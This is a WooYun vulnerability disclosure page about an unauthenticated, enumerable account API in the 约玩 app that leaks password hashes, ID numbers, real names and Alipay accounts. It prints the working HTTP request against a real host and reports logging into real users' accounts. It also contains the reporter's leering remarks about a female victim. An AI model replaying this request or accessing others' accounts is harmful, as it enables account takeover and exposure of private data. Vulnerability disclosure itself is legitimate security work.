当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147718

漏洞标题:约玩APP某漏洞导致所有用户帐号密码以及个人信息泄漏

相关厂商:约玩APP

漏洞作者: sauren

提交时间:2015-10-19 12:45

修复时间:2015-12-03 12:46

公开时间:2015-12-03 12:46

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

如题,泄漏全部用户的用户密码。 主播的身份证 真实名称 支付宝账户信息也泄漏了~~~~~~
哈哈,发完找个妹子线下约起来~
美女真的很漂亮!~

详细说明:

其实是某接口测漏了。
1.

约玩01.png


如图所示接口,用户ID随意遍历。木有任何验证!

POST /Account_findAccount.action HTTP/1.1
Host: 121.40.205.90
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-Hans;q=1, en;q=0.9, fr;q=0.8, de;q=0.7, ja;q=0.6, nl;q=0.5
Connection: keep-alive
User-Agent: laizhan/1.1 (iPhone; iOS 7.1.1; Scale/2.00)
id=1384


接口如上。泄漏的用户密码我们MD5解密下。
2.

约玩02.png


3.登录之

约玩03.png


4.换个主播用户试一试。

约玩04.png


可以看到,主播的身份证,真实姓名,以及支付宝帐号都泄漏了。。。万一主播支付宝用的是同一个密码。。。。。
5.

约玩05.png


美女真的很漂亮啊
6.

约玩06.png


可以约吗?

漏洞证明:

美女真的很漂亮!~

修复方案:

不要请临时工去写接口了。。。要不换我? 哈哈

版权声明:转载请注明来源 sauren@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评论

  1. 2015-10-19 12:46 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 哈!躁起来!)

    到底是要约啥

  2. 2015-10-19 13:44 | sauren ( 实习白帽子 | Rank:48 漏洞数:21 | 天天打DOTA,快乐你我他~)

    @浩天 约撸啊 LOL完了之后就。。。 哈哈